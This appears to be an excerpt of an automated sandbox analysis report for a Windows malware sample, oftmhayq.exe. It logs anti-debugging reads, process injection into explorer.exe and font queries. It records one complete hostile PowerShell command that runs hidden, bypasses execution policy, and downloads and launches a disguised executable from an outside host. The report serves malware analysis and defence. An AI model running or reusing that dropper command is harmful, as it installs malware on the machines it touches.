          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3ACA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8ADD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D12D4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0135A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137CD04 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D354C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D354C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FD52 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01313D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01383D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01388D47 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3591 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01388DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013095EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D95F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D95F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FDD3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D15C1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4439 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8C14 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8410 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315C70 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exe; Process token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Bypasses PowerShell execution policy
          Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\oftmhayq.exe; Memory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\oftmhayq.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\oftmhayq.exe; Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\oftmhayq.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Users\Public\oftmhayq.exe; Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000001F.00000000.506248785.0000000006860000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe; Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
